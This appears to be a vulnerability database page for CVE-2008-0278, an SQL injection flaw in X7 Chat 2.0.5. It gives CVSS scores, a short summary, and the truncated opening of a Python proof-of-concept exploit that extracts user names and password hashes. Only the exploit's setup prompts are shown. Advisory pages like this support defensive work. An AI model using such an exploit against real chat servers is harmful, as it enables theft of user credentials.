6
CVSSv2

CVE-2008-0278

Published: 15/01/2008 Updated: 29/09/2017
CVSS v2 Base Score: 6 | Impact Score: 6.4 | Exploitability Score: 6.8
VMScore: 605
Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in X7 Chat 2.0.5 and possibly earlier allows remote malicious users to execute arbitrary SQL commands via the day parameter in a sm_window action.

Vulnerable Product Search on Vulmon Subscribe to Product

x7 group x7 chat

Exploits

#!/usr/bin/python # #Exploit for xchat 205 #Saca los usuarios y los hash #By nonroot - 2008 #it's a PoC, please use responsibly # import string,urllib import sys,re print "Target host: ie: 127001/x7chat/" host=raw_input("Target host ( include http and /): ") print "Output file: ie: salidatxt" out_file=raw_input("Output file: ") print ...